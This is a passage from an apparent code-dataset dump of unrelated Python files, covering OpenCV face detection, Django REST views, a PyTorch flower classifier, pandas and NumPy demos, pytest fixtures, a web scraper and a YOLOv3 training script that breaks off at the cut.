a = a + [4]
print(a)
a = a + [[5, 6]]
print(a)
print('-' * 20)

# Sorting: numbers ascend, strings sort lexicographically.
a = sorted([1, 4, 2, 3])
print(a)
a = sorted(['b', 'c', 'a'])
print(a)
|
23,510 | 8b372b368b25d83d7e2af84f1d5019d830da9bf5 | import numpy as np
import cv2
# Load the Haar cascade once, outside the frame loop -- the original
# re-created the classifier for every single frame.
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')

video = cv2.VideoCapture('video/test1.mp4')
while True:
    ret, orig_frame = video.read()
    if not ret:
        # End of clip: reopen from the start so the video loops forever.
        video = cv2.VideoCapture('video/test1.mp4')
        continue
    gray = cv2.cvtColor(orig_frame, cv2.COLOR_BGR2GRAY)
    faces = face_cascade.detectMultiScale(gray, scaleFactor=1.02, minNeighbors=5)
    # BUG FIX: the original tested "len(faces) is not 0", an identity
    # comparison on an int literal (SyntaxWarning on Python 3.8+ and not
    # guaranteed to work); use a value comparison instead.
    if len(faces) != 0:
        print(len(faces))
        print(faces)
        for (x, y, w, h) in faces:
            cv2.rectangle(gray, (x, y), (x + w, y + h), (0, 255, 0), 3)
    cv2.imshow('Frame', gray)
    key = cv2.waitKey(15)
    if key == 27:  # Esc quits
        break

video.release()
cv2.destroyAllWindows()
|
23,511 | c5edfe3fc77b3eab6ea6e9c093f4a6564840bd5c | #class Prime_No(object):
def is_prime_number(num):
    """Return the list of primes in [2, num].

    Kept the original (unusual) contract for backward compatibility:
    returns the string "Must be an integer" for non-int input and
    False when num < 2; otherwise a list of primes up to num inclusive.

    BUG FIX: the original checked ``num < 2`` before the type check, so a
    non-comparable input (e.g. a str) raised TypeError on Python 3 instead
    of returning the intended message. Validate the type first.
    """
    if not isinstance(num, int):
        return "Must be an integer"
    if num < 2:
        return False
    prime_numbers = []
    for candidate in range(2, num + 1):
        # Trial division up to sqrt(candidate) is sufficient.
        if all(candidate % d for d in range(2, int(candidate ** 0.5) + 1)):
            prime_numbers.append(candidate)
    return prime_numbers
print is_prime_number(23)
|
23,512 | 8d862e94493caa0ee011f8586c496cd1d429ff67 | from django.urls import path
from player import views
# URL routes for the player app's REST endpoints.
urlpatterns = [
    path('upload', views.Upload.as_view()),                   # upload a track
    path('musics', views.MusicsList.as_view()),               # list all tracks
    path('music_one/<int:pk>', views.MusicDetail.as_view()),  # one track by primary key
]
23,513 | d4463ee136967c190d45b62cba8b098f112c80a9 | # -*- coding: utf-8 -*-
# Authors: Y. Jia <ytjia.zju@gmail.com>
"""
Given a collection of intervals, merge all overlapping intervals.
https://leetcode.com/problems/merge-intervals/description/
"""
# Definition for an interval.
class Interval(object):
    """A closed interval [start, end]; two intervals compare equal when
    both endpoints match."""

    def __init__(self, s=0, e=0):
        self.start = s
        self.end = e

    def __eq__(self, other):
        return (self.start, self.end) == (other.start, other.end)
class Solution(object):
    def merge(self, intervals):
        """
        Merge all overlapping intervals.

        Sorts *intervals* in place by start and widens the anchor
        interval's ``end`` whenever the next one overlaps it.

        :type intervals: List[Interval]
        :rtype: List[Interval]
        """
        if len(intervals) <= 1:
            return intervals

        intervals.sort(key=lambda iv: iv.start)
        merged = [intervals[0]]
        for current in intervals[1:]:
            last = merged[-1]
            if last.end >= current.start:
                # Overlap: absorb the current interval into the anchor.
                last.end = max(last.end, current.end)
            else:
                merged.append(current)
        return merged
|
23,514 | c13fb7fb5bbb89d87727734dd940f43acd65763c | # from .models import Semester
# from django.views.decorators.csrf import csrf_exempt
# from .serializers import SemesterSerializer
# from django.views import generic
# from rest_framework import viewsets, filters
# from django.http import HttpResponse
# @csrf_exempt
# def index(request):
# return HttpResponse("hello")
# class SemesterViewSet(viewsets.ModelViewSet):
# '''
# Get all Semester
# '''
# queryset = Semester.objects.all()
# serializer_class = SemesterSerializer
from .models import Semester
from .serializers import SemesterSerializer
# from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework.decorators import api_view
@api_view(['GET','POST'])
def SemesterList(request, format=None):
    """List every semester (GET) or create one from the request body (POST)."""
    if request.method == 'GET':
        semester = Semester.objects.all()
        serializer = SemesterSerializer(semester, many=True)
        return Response(serializer.data)
    if request.method == 'POST':
        # print(request.data['studname'])
        # return Response(status=status.HTTP_404_NOT_FOUND)
        serializer = SemesterSerializer(data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data, status=status.HTTP_201_CREATED)
        # Validation failed: report the field errors.
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET','PUT','DELETE'])
def SemesterDetail(request, pk, format=None):
    """Retrieve (GET), update (PUT) or delete (DELETE) one semester by pk."""
    # print("coming\n\n")
    try:
        semester = Semester.objects.get(pk=pk)
    except Semester.DoesNotExist:
        # NOTE(review): when the pk does not exist this CREATES a new
        # record from the request body instead of returning 404 (the
        # commented line below was the 404 path) -- this also runs for
        # GET and DELETE; confirm this upsert behaviour is intentional.
        # return Response(status=status.HTTP_404_NOT_FOUND)
        serializer = SemesterSerializer(data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data, status=status.HTTP_201_CREATED)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
    if request.method == 'GET':
        serializer = SemesterSerializer(semester)
        return Response(serializer.data)
    elif request.method == 'PUT':
        # Full update: all required fields must be present in the body.
        serializer = SemesterSerializer(semester, data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data, status=status.HTTP_201_CREATED)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
    elif request.method == 'DELETE':
        semester.delete()
        return Response(status=status.HTTP_204_NO_CONTENT)
|
23,515 | def510854f605e2ef69291b3cd6c81c600e8bf64 | """
This is a setup.py script generated by py2applet
Usage:
python setup.py py2app
"""
from setuptools import setup

# py2app bundle configuration for the AgSoft Tk application.
APP = ['AgSoft.py']
# Ship the local "data" directory at the root of the .app resources.
DATA_FILES = [('',['data'])]
OPTIONS = {'argv_emulation': True,
           'includes':['tkinter'],
           # NOTE(review): absolute, machine-specific icon path — breaks
           # builds on any other machine; consider a relative path.
           'iconfile': '/Users/amjadali/Desktop/AgSoft3/icon2.icns'}

setup(
    app=APP,
    data_files=DATA_FILES,
    py_modules=['fileOpen','fileOpen2','firstFrame','runOptimum','showRslt','tables'],
    options={'py2app' : OPTIONS},
    setup_requires=['py2app'],
)
|
23,516 | 23732a02a4224ca02a349d32ab3394b89dcb484b | #import pandas as pd
#data=pd.Series([5,2,1,-5,9,8411],index=["a","sa","s","asse","ss","f"])
#print(data)
import pandas as pd
# Demo DataFrame: two string columns with an explicit row index.
data=pd.DataFrame({
    "name":["nimo","bob","opt"],
    "ioi":["sPOf","asoid","saprmf"],
    },index=["a","b","c",])
#print(data)
#print("------------------")
#print(data.iloc[2],sep="\n")
#print(data.loc["c"],sep="\n")
#print(data.shape)
#print(data.index)
# Select one column (a Series) and print it.
print(data["name"],sep="\n")
iooi=data["name"]
# The label string below says "uppercase all names" (kept verbatim).
print("把name全部轉大寫",iooi.str.upper(),sep="\n")
# Add two new numeric columns; "cp" copies the values of "jump".
data["jump"]=[5500,500,90]
data["cp"]=data["jump"]
print(data)
|
23,517 | 2a122828dfb06c45254801d9f9d2618c0a6cd6f7 | from flask import Flask, render_template
app = Flask(__name__)

# NOTE(review): "/<name>/" and "/<name>" are two separate routes rendering
# the same template; the second also accepts POST but never reads the
# request body — confirm whether one of them is redundant.
@app.route('/<name>/')
def home(name):
    # Render the shared template with the URL segment as context.
    return render_template('homepage.html', name=name)

@app.route("/<name>", methods=['GET', 'POST'])
def picture(name):
    return render_template('homepage.html', name=name)

if __name__ == '__main__':
    # Debug mode: auto-reload + interactive traceback (development only).
    app.debug = True
    app.run()
|
23,518 | 01b9fd22dfaa23bd0d34e0ecb06d703f02495ea3 | # Imports here
import torch
import numpy as np
from torch import nn
from torch import optim
import torch.nn.functional as F
from torchvision import datasets, transforms, models
from collections import OrderedDict
from workspace_utils import active_session
from PIL import Image
import sys
import os
import json
# Define class for flower prediction model
class FlowerPredictionModel:
    """Transfer-learning classifier for 102 flower categories.

    Wraps a pretrained torchvision backbone with a custom feed-forward
    classifier head, plus train / test / save / load / predict helpers.
    """
    # Model class constructor
    def __init__(self, gpu):
        ''' Initialise model object

        gpu -- when truthy, use CUDA if available; otherwise force CPU.
        '''
        # Set device
        if (gpu):
            self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
        else:
            # NOTE(review): plain string here vs torch.device above —
            # both are accepted by .to(), but the types are inconsistent.
            self.device = "cpu"

    # Function to build model
    def build(self, arch, learning_rate, hidden_units):
        ''' Function to build model

        arch -- torchvision model name (e.g. "vgg16"); case-insensitive.
        learning_rate -- Adam learning rate for the classifier head.
        hidden_units -- size of the hidden layer in the new classifier.
        '''
        print('Building model...')
        # Select & load pre-trained model
        try:
            arch = arch.lower()
            self.model = models.__dict__[arch](pretrained=True)
            self.arch = arch
        except:
            print("Model " + arch + " not recognised: please refer to documentation for valid model names in pytorch ie vgg16 https://pytorch.org/docs/stable/torchvision/models.html")
            sys.exit()
        self.hidden_units = hidden_units
        self.learning_rate = learning_rate
        # Freeze parameters of pre-trained model part by removing gradients
        for param in self.model.parameters():
            param.requires_grad = False
        # Determine classifier input units for selected model
        if hasattr(self.model, "classifier"):
            try:
                # Sequential classifier (e.g. VGG-style): first layer's inputs.
                classifier_input_neurons = self.model.classifier[0].in_features
            except TypeError:
                # Single Linear classifier: read in_features directly.
                classifier_input_neurons = self.model.classifier.in_features
        elif hasattr(self.model, "fc"):
            classifier_input_neurons = self.model.fc.in_features
        else:
            print("Unable to determine classifier input units number - unable to create model")
            return
        # Classifier architecture parameters
        classifier_output_neurons = 102
        classifier_dropout = 0.2
        # Build new classifier for recognising flowers to work with model
        self.model.classifier = nn.Sequential(OrderedDict([
                                ('fc1', nn.Linear(classifier_input_neurons, hidden_units)),
                                ('relu', nn.ReLU()),
                                ('dropout', nn.Dropout(classifier_dropout)),
                                ('fc2', nn.Linear(hidden_units, classifier_output_neurons)),
                                ('output', nn.LogSoftmax(dim=1))]))
        # Define model loss function (NLL pairs with the LogSoftmax output)
        self.criterion = nn.NLLLoss()
        # Define training function: only train the classifier parameters, feature parameters are frozen
        self.optimizer = optim.Adam(self.model.classifier.parameters(), lr=learning_rate)
        # Move model to current device
        self.model.to(self.device)

    # Function to train model
    def train(self, epochs, trainloader, validloader, class_to_idx):
        ''' Function to train model

        Runs `epochs` passes over trainloader; every 20 steps it evaluates
        on validloader and prints running loss/accuracy.
        '''
        print('Training model...')
        # Set variables
        self.epochs = epochs
        self.training_steps = 0
        training_loss = 0
        print_every = 20
        self.model.class_to_idx = class_to_idx
        # Train network
        # Ensure notebook session stays active through long runs
        with active_session():
            # For each training pass of whole dataset/epoch
            for epoch in range(epochs):
                print(f"Epoch {epoch+1}")
                print("-------")
                # For each training batch/step of images & labels
                for inputs, labels in trainloader:
                    # Increment training steps count
                    self.training_steps += 1
                    # Move data and label tensors to device
                    inputs, labels = inputs.to(self.device), labels.to(self.device)
                    # Clear gradients
                    self.optimizer.zero_grad()
                    # Do forward pass through network
                    logps = self.model(inputs)
                    # Calculate loss for whole network
                    loss = self.criterion(logps, labels)
                    # Calculate gradients for each element to be trained by network (weights & biases)
                    loss.backward()
                    # Do back-propogation step: apply negative gradients to weights & biases
                    self.optimizer.step()
                    # Accumulate training loss
                    training_loss += loss.item()
                    # Every 20 training steps, validation check & output stats
                    if self.training_steps % print_every == 0:
                        valid_loss = 0
                        accuracy = 0
                        # Switch to evaluation mode - dropout inactive
                        self.model.eval()
                        # Disable gradients - not needed for modal validation/prediction
                        with torch.no_grad():
                            # For each validation batch of images & labels
                            for inputs, labels in validloader:
                                # Move data and label tensors to device
                                inputs, labels = inputs.to(self.device), labels.to(self.device)
                                # Do forward pass through network
                                logps = self.model.forward(inputs)
                                # Calculate loss for network
                                batch_loss = self.criterion(logps, labels)
                                # Accumulate validation loss
                                valid_loss += batch_loss.item()
                                # Calculate stats
                                # Get actual probabilties output from network for this batch
                                ps = torch.exp(logps)
                                # Get top probability/prediction for each image in batch
                                top_p, top_class = ps.topk(1, dim=1)
                                # Check each prediction against label (accuracy)
                                equals = top_class == labels.view(*top_class.shape)
                                # Calculate mean accuracy for this batch
                                accuracy += torch.mean(equals.type(torch.FloatTensor)).item()
                        # Output stats for current training step
                        print(f"Training step {self.training_steps}")
                        print(f"Training loss: {training_loss/print_every:.3f} - "
                              f"Validation loss: {valid_loss/len(validloader):.3f} - "
                              f"Validation accuracy: {accuracy/len(validloader):.3f}")
                        # Validation end - reset training loss & set model back to training mode
                        training_loss = 0
                        self.model.train()

    # Function to test model
    def test(self, testloader):
        ''' Function to test model

        Prints mean top-1 accuracy over all batches of testloader.
        '''
        print('Testing model...')
        accuracy = 0
        # Switch to evaluation mode - dropout inactive
        self.model.eval()
        # Disable gradients - not needed for modal testing/prediction
        with torch.no_grad():
            # For each test batch of images & labels
            for inputs, labels in testloader:
                # Move data and label tensors to device
                inputs, labels = inputs.to(self.device), labels.to(self.device)
                # Do forward pass through network
                logps = self.model.forward(inputs)
                # Calculate stats
                # Get actual probabilties output from network for this batch
                ps = torch.exp(logps)
                # Get top probability/prediction for each image in batch
                top_p, top_class = ps.topk(1, dim=1)
                # Check each prediction against label (accuracy)
                equals = top_class == labels.view(*top_class.shape)
                # Calculate mean accuracy for this batch
                accuracy += torch.mean(equals.type(torch.FloatTensor)).item()
            else:
                # for/else: runs once the loop finishes (no break is used).
                # Output accuracy for entire test dataset
                print(f"Test accuracy: {accuracy/len(testloader):.3f}")

    # Function to save model
    def save(self, save_dir):
        ''' Function to save model

        Writes <save_dir>/checkpoint.pth; creates save_dir if needed.
        '''
        print('Saving model...')
        # If save dir set
        if (save_dir):
            save_dir = save_dir + '/'
            # If it does not exist
            if (not os.path.isdir(save_dir)):
                # Make dir
                try:
                    os.mkdir(save_dir)
                except OSError:
                    print ("Creation of the directory %s failed" % save_dir)
                    print ("Model was not saved")
                    sys.exit()
        # Define checkpoint parameters
        checkpoint = {'class_to_idx': self.model.class_to_idx,
                      'model_state_dict': self.model.state_dict(),
                      'arch': self.arch,
                      'learning_rate': self.learning_rate,
                      'hidden_units': self.hidden_units,
                      'epochs': self.epochs,
                      'training_steps': self.training_steps}
        # Save it
        torch.save(checkpoint, save_dir + 'checkpoint.pth')

    # Function to save model
    def load(self, save_dir):
        ''' Function to load model

        Rebuilds the architecture from the checkpoint, then restores
        weights and the class-to-index mapping.
        '''
        print('Loading model...')
        # Load checkpoint
        if torch.cuda.is_available():
            checkpoint = torch.load(save_dir + 'checkpoint.pth')
        else:
            # Remap CUDA-saved tensors onto the CPU.
            checkpoint = torch.load(save_dir + 'checkpoint.pth', map_location=lambda storage, loc: storage)
        # Create model
        self.build(checkpoint['arch'], checkpoint['learning_rate'], checkpoint['hidden_units'])
        # Load classifier state values from checkpoint
        self.model.load_state_dict(checkpoint['model_state_dict'])
        self.model.class_to_idx = checkpoint['class_to_idx']

    def predict(self, np_image, topk):
        ''' Predict the class (or classes) of an image using a trained deep learning model.

        np_image -- numpy array for one image (no batch dimension).
        topk -- number of top classes/probabilities to return.
        '''
        print('Model predicting...')
        # Convert image to tensor
        image_tensor = torch.from_numpy(np_image)
        # Add batch dimension to tensor
        image_tensor = image_tensor.unsqueeze_(0)
        # Convert to float tensor
        image_tensor = image_tensor.float()
        # Switch to evaluation mode - dropout inactive
        self.model.eval()
        # Disable gradients - not needed for model prediction
        # NOTE(review): the input tensor is never moved to self.device —
        # assumes the model is on CPU at prediction time; confirm.
        with torch.no_grad():
            # Do forward pass through network
            logps = self.model.forward(image_tensor)
        # Get actual probabilties output from network for this image
        ps = torch.exp(logps)
        # Get topk probability/prediction for this image
        top_p, top_class = ps.topk(topk, dim=1)
        top_p = top_p.numpy()
        top_class = top_class.numpy()
        # Invert class map
        idx_to_class = {j: i for i, j in self.model.class_to_idx.items()}
        # Map indexes to get true class indexes
        top_classes = [idx_to_class[index] for index in top_class[0]]
        # Return probabilties and classes
        return top_p[0], top_classes

    def predict_image(self, image_path, np_image, top_k, category_names_json):
        # Run prediction and print results; with a category-name JSON the
        # class ids are translated to human-readable flower names.
        print('Testing model prediction...')
        # Get image file parts (second-to-last path segment = category dir)
        image_filename = image_path.split('/')[-2]
        # Get prediction of image
        probs, classes = self.predict(np_image, top_k)
        print(" ")
        # If category names set
        if (category_names_json):
            with open(category_names_json, 'r') as f:
                cat_to_name = json.load(f)
            classes = [cat_to_name[x] for x in classes]
            print("Actual flower category: " + cat_to_name[image_filename])
        print("Categories predicted")
        print(classes)
        print("Probabilities of categories predicted")
        print(probs)
|
23,519 | 3f1a88b13c8ee02e4af09f7aaded05a1260f3e7f | from django.contrib import admin
from .models import Art, TheUser
# Register your models here.
# Expose both models in the Django admin with default ModelAdmin options.
admin.site.register(Art)
admin.site.register(TheUser)
|
23,520 | 92a0972e7e8654c76d3ea37f39aaaef14b62019c | #Addition (+)
#Multiplication (*)
# Demo of the two string operators: + concatenates, * repeats.
a = "Python"
b = "Programming"
c = "".join((a, b))   # same value as a + b
print(c)
d = a + a             # same value as a * 2
print(d)
23,521 | db8442b9a085c10f9b125eee69f07449da7b014e |
def setup_module(module):
    # pytest module-level setup hook: runs once before any test in the module.
    print("setup_module")
def teardown_module(module):
    # pytest module-level teardown hook: runs once after the last test.
    print("teardown_module")
class TestClass:
    """Demonstrates pytest's xunit-style class/method setup & teardown hooks."""

    @classmethod
    def setup_class(cls):
        # Runs once before any test in this class.
        print("setup_class")

    @classmethod
    def teardown_class(cls):
        # Runs once after the last test in this class.
        print("teardown_class")

    # Bug fix 1: the original defined ``setup_method`` twice — a no-op
    # ``setup_method(self)`` immediately shadowed by this one; the dead
    # duplicate is removed.
    # Bug fix 2: ``method == self.test1`` compared the hook's ``method``
    # argument against a *bound* method object, which is not reliably equal
    # to the function object pytest passes — every call fell through to
    # "unknown!". Comparing by name works regardless of binding.
    def setup_method(self, method):
        if method.__name__ == "test1":
            print("setup_method-test1")
        elif method.__name__ == "test2":
            print("setup_method-test2")
        else:
            print("setup_method-unknown!")

    def teardown_method(self, method):
        if method.__name__ == "test1":
            print("teardown_method-test1")
        elif method.__name__ == "test2":
            print("teardown_method-test2")
        else:
            print("teardown_method-unknown!")

    def test1(self):
        print("test1")
        assert True

    def test2(self):
        print("test2")
        assert True
|
23,522 | aa57e54665449c3cc07d9a3319f82f07e15e8af4 | import os
import signal
from pathlib import Path
import utils
def stop():
    """Stop the famdb server whose PID is recorded in ``famdb.pid``.

    No-op when the PID file is absent. When the file exists but the
    process is already gone, a FATAL message is printed (the stale file
    is deliberately left in place, matching the original behaviour).
    """
    path = Path("famdb.pid")
    if not path.exists():
        return
    # Bug fix: the file handle was opened without a context manager and,
    # on some paths, logic depended on reading the whole file into a list.
    # 'with' guarantees the handle is closed; the PID is the first line.
    with path.open() as file:
        pid = int(file.readline())
    if utils.isPidRunning(pid):
        os.kill(pid, signal.SIGKILL)
        os.remove("famdb.pid")
        return
    else:
        print('FATAL:PID file detected, but no running process found')
        return
|
23,523 | 1202864d9e77cb020c74b59abd042620335d305c | import shutil, os, datetime, time
#import Filecopy_drill
# NOTE: Python 2 script (print-statement syntax).
# Moves every entry from Folder A to Folder B in sorted name order.
source = "C:\\Folder A\\"
dest = "C:\\Folder B\\"

files = os.listdir(source)
files.sort()
for f in files:
    src = source +f
    dst = dest +f
    # NOTE(review): os.listdir also returns subdirectories — confirm the
    # source folder only contains files, or filter with os.path.isfile.
    shutil.move(src, dst)
    print "Moved file: %s from %s to %s " %(f, source, dest)
|
23,524 | 97d081f67764060128b916850af5f9c3dbf1b7c1 | import requests
from bs4 import BeautifulSoup
import csv
import pandas as pd
def scrape():
    """Scrape Conservapedia's Special:AllPages index and dump each page's
    title, URL and text content to conservapedia.csv."""
    index_url = "https://www.conservapedia.com/Special:AllPages"
    index_page = requests.get(index_url)
    index_soup = BeautifulSoup(index_page.text, "html.parser")
    # All article links live inside the "mw-allpages-chunk" listing.
    link_sec = index_soup.find(class_="mw-allpages-chunk")
    link_list = link_sec.find_all("a")
    # Map page title -> absolute URL.
    site_dict = {}
    for link in link_list:
        page_title = link.contents[0]
        page_link = "https://www.conservapedia.com"+link.get("href")
        site_dict[page_title] = page_link
    # Bug fix: the original stored only the csv.writer and then called
    # f.close() on it — csv.writer objects have no close() (AttributeError
    # after all the scraping work), and the underlying file handle was
    # never closed. Keep the handle, let 'with' close it, and pass
    # newline="" as the csv docs require.
    with open("conservapedia.csv", "w", newline="") as out_file:
        f = csv.writer(out_file)
        f.writerow(["page_title","page_link","page_contents"])
        for k,v in site_dict.items():
            page = requests.get(v)
            page_soup = BeautifulSoup(page.text, "html.parser")
            page_body = page_soup.find(id="content")
            page_content = page_body.find("div", class_="mw-content-ltr")
            text = page_content.get_text()
            f.writerow([k,v,text])
    return

scrape()
23,525 | 0a0ebccb3182f36aee62d50078b387f578679aab | def test_quantity_of_money(client):
assert client.get("/quantity_of_money").data.decode() == "10000"
def test_put_money(client):
    # Depositing 100 must raise the reported balance by exactly 100.
    money = int(client.get("/quantity_of_money").data)
    money = str(money + 100)
    client.post("/put_money?amount=100")
    assert client.get("/quantity_of_money").data.decode() == money
def test_get_profit(client):
    # Deposits are not profit: /get_profit stays 0 before and after put_money.
    assert client.get("/get_profit").data.decode() == "0"
    client.post("/put_money?amount=100")
    assert client.get("/get_profit").data.decode() == "0"
def test_type(client):
    # Both listing endpoints must serve JSON objects (dicts).
    assert isinstance(client.get("/get_stocks").json, dict)
    assert isinstance(client.get("/get_prices").json, dict)
def test_sell_nothing(client):
    # Selling a stock we do not own must be rejected with "Failed".
    assert (
        client.post("/sell_stocks?stock={}&amount={}".format("hor5", 1)).data.decode()
        == "Failed"
    )
def test_buy(client):
    # Buying then selling one share must debit and credit the balance by
    # the quoted price each time (price is re-read before the sale because
    # it may have changed between the two operations).
    price_dict = client.get("/get_prices").json
    price = price_dict["hor5"]
    money = int(client.get("/quantity_of_money").data)
    money = str(money - price)
    client.post("/buy_stocks?stock={}&amount={}".format("hor5", 1))
    assert client.get("/quantity_of_money").data.decode() == money
    price_dict = client.get("/get_prices").json
    price = price_dict["hor5"]
    money = str(int(money) + price)
    client.post("/sell_stocks?stock={}&amount={}".format("hor5", 1))
    assert client.get("/quantity_of_money").data.decode() == money
|
23,526 | 893fe5404a09b5002ce1fbe39ccd3e8de6b23b53 | import numpy as np
# Demo: inspecting array shape and reshaping with NumPy.
arr = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])

print('The shape of an array is the number of elements in each dimension.')
#Print the shape of a 2-D array
print(arr.shape)

#Print the shape of a 5-D array (ndmin pads leading singleton dimensions)
arr = np.array([1, 2, 3, 4], ndmin=5)
print(arr)
print('shape of array :', arr.shape)

#Reshaping arrays
print('\n\nReshape From 1-D to 2-D')
arr = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12])
newarr = arr.reshape(4, 3)
print(newarr)

print('\n\nReshape From 1-D to 3-D')
arr = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12])
newarr = arr.reshape(2, 3, 2)
print(newarr)

#Returns Copy or View?
# Bug fix: to show whether reshape returned a view or a copy, print .base —
# it is the original array for a view and None for a copy. The original
# line printed the reshaped array itself, which demonstrates nothing.
print('Base/Return Type of reshape:', newarr.base)

#Unknown Dimension
newarr = arr.reshape(2, 2, -1) #Numpy calculate the dimension
print(newarr)
23,527 | a171e943158df2b0ce22509d9b60914031ba4fcd | """
Retrain the YOLO model for your own dataset.
"""
import os
os.environ['CUDA_VISIBLE_DEVICES']='1'  # pin training to GPU 1 (set before TF import)
import numpy as np
import keras.backend as K
import tensorflow as tf
K.set_image_data_format('channels_last')
# Grow GPU memory on demand instead of reserving the full device up front.
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
tf.keras.backend.set_session(tf.Session(config=config))

from keras.layers import Input, Lambda
from keras.models import Model
from keras.optimizers import Adam
from keras.callbacks import TensorBoard, ModelCheckpoint, ReduceLROnPlateau, EarlyStopping

from yolo3.model import preprocess_true_boxes, yolo_body, tiny_yolo_body, yolo_loss
from yolo3.utils import get_random_data
def _main():
    """Two-stage YOLOv3 training: frozen-backbone warm-up, then full fine-tune."""
    annotation_path = 'train.txt'
    log_dir = 'logs/000/'
    classes_path = 'model_data/classes.txt'
    anchors_path = 'model_data/yolo_anchors.txt'
    class_names = get_classes(classes_path)
    num_classes = len(class_names)
    anchors = get_anchors(anchors_path)

    input_shape = (416,416) # multiple of 32, hw

    # Six anchors means the tiny variant; full YOLOv3 uses nine.
    is_tiny_version = len(anchors)==6 # default setting
    if is_tiny_version:
        model = create_tiny_model(input_shape, anchors, num_classes,
            freeze_body=2, weights_path='model_data/tiny_yolo_weights.h5')
    else:
        model = create_model(input_shape, anchors, num_classes,
            freeze_body=2, weights_path='model_data/yolo_weights.h5') # make sure you know what you freeze

    logging = TensorBoard(log_dir=log_dir)
    checkpoint = ModelCheckpoint(log_dir + 'ep{epoch:03d}-loss{loss:.3f}-val_loss{val_loss:.3f}.h5',
        monitor='val_loss', save_weights_only=True, save_best_only=True, period=3)
    reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=3, verbose=1)
    early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=10, verbose=1)

    # Reproducible train/val split: fixed seed for the shuffle, then reseed.
    val_split = 0.1
    with open(annotation_path) as f:
        lines = f.readlines()
    np.random.seed(10101)
    np.random.shuffle(lines)
    np.random.seed(None)
    num_val = int(len(lines)*val_split)
    num_train = len(lines) - num_val

    # Train with frozen layers first, to get a stable loss.
    # Adjust num epochs to your dataset. This step is enough to obtain a not bad model.
    if True:
        model.compile(optimizer=Adam(lr=1e-3), loss={
            # use custom yolo_loss Lambda layer.
            'yolo_loss': lambda y_true, y_pred: y_pred})

        batch_size = 32
        print('Train on {} samples, val on {} samples, with batch size {}.'.format(num_train, num_val, batch_size))
        model.fit_generator(data_generator_wrapper(lines[:num_train], batch_size, input_shape, anchors, num_classes),
                steps_per_epoch=max(1, num_train//batch_size),
                validation_data=data_generator_wrapper(lines[num_train:], batch_size, input_shape, anchors, num_classes),
                validation_steps=max(1, num_val//batch_size),
                epochs=50,
                initial_epoch=0,
                callbacks=[logging, checkpoint])
        model.save_weights(log_dir + 'trained_weights_stage_1.h5')

    # Unfreeze and continue training, to fine-tune.
    # Train longer if the result is not good.
    if True:
        for i in range(len(model.layers)):
            model.layers[i].trainable = True
        model.compile(optimizer=Adam(lr=1e-4), loss={'yolo_loss': lambda y_true, y_pred: y_pred}) # recompile to apply the change
        print('Unfreeze all of the layers.')

        batch_size = 32 # note that more GPU memory is required after unfreezing the body
        print('Train on {} samples, val on {} samples, with batch size {}.'.format(num_train, num_val, batch_size))
        model.fit_generator(data_generator_wrapper(lines[:num_train], batch_size, input_shape, anchors, num_classes),
            steps_per_epoch=max(1, num_train//batch_size),
            validation_data=data_generator_wrapper(lines[num_train:], batch_size, input_shape, anchors, num_classes),
            validation_steps=max(1, num_val//batch_size),
            epochs=100,
            initial_epoch=50,
            callbacks=[logging, checkpoint, reduce_lr, early_stopping])
        model.save_weights(log_dir + 'trained_weights_final.h5')

    # Further training if needed.
# Further training if needed.
def get_classes(classes_path):
    '''loads the classes: one class name per line, stripped of whitespace'''
    with open(classes_path) as handle:
        return [name.strip() for name in handle.readlines()]
def get_anchors(anchors_path):
    '''loads the anchors from a file: first line, comma-separated, as (N, 2)'''
    with open(anchors_path) as handle:
        first_line = handle.readline()
    values = [float(item) for item in first_line.split(',')]
    return np.array(values).reshape(-1, 2)
def create_model(input_shape, anchors, num_classes, load_pretrained=True, freeze_body=2,
            weights_path='model_data/yolo_weights.h5'):
    '''create the training model

    Wraps yolo_body with a yolo_loss Lambda layer so Keras can "fit" a
    model whose output *is* the loss. freeze_body: 1 = freeze darknet53
    backbone only, 2 = freeze all but the 3 output layers.
    '''
    K.clear_session() # get a new session
    image_input = Input(shape=(None, None, 3))
    h, w = input_shape
    num_anchors = len(anchors)

    # One ground-truth input per output scale (strides 32/16/8).
    y_true = [Input(shape=(h//{0:32, 1:16, 2:8}[l], w//{0:32, 1:16, 2:8}[l], \
        num_anchors//3, num_classes+5)) for l in range(3)]

    model_body = yolo_body(image_input, num_anchors//3, num_classes)
    print('Create YOLOv3 model with {} anchors and {} classes.'.format(num_anchors, num_classes))

    if load_pretrained:
        model_body.load_weights(weights_path, by_name=True, skip_mismatch=True)
        print('Load weights {}.'.format(weights_path))
        if freeze_body in [1, 2]:
            # Freeze darknet53 body or freeze all but 3 output layers.
            num = (185, len(model_body.layers)-3)[freeze_body-1]
            for i in range(num): model_body.layers[i].trainable = False
            print('Freeze the first {} layers of total {} layers.'.format(num, len(model_body.layers)))

    model_loss = Lambda(yolo_loss, output_shape=(1,), name='yolo_loss',
        arguments={'anchors': anchors, 'num_classes': num_classes, 'ignore_thresh': 0.5})(
        [*model_body.output, *y_true])
    model = Model([model_body.input, *y_true], model_loss)

    return model
def create_tiny_model(input_shape, anchors, num_classes, load_pretrained=True, freeze_body=2,
            weights_path='model_data/tiny_yolo_weights.h5'):
    '''create the training model, for Tiny YOLOv3

    Same structure as create_model but with two output scales (strides
    32/16) and anchors split in halves instead of thirds.
    '''
    K.clear_session() # get a new session
    image_input = Input(shape=(None, None, 3))
    h, w = input_shape
    num_anchors = len(anchors)

    y_true = [Input(shape=(h//{0:32, 1:16}[l], w//{0:32, 1:16}[l], \
        num_anchors//2, num_classes+5)) for l in range(2)]

    model_body = tiny_yolo_body(image_input, num_anchors//2, num_classes)
    print('Create Tiny YOLOv3 model with {} anchors and {} classes.'.format(num_anchors, num_classes))

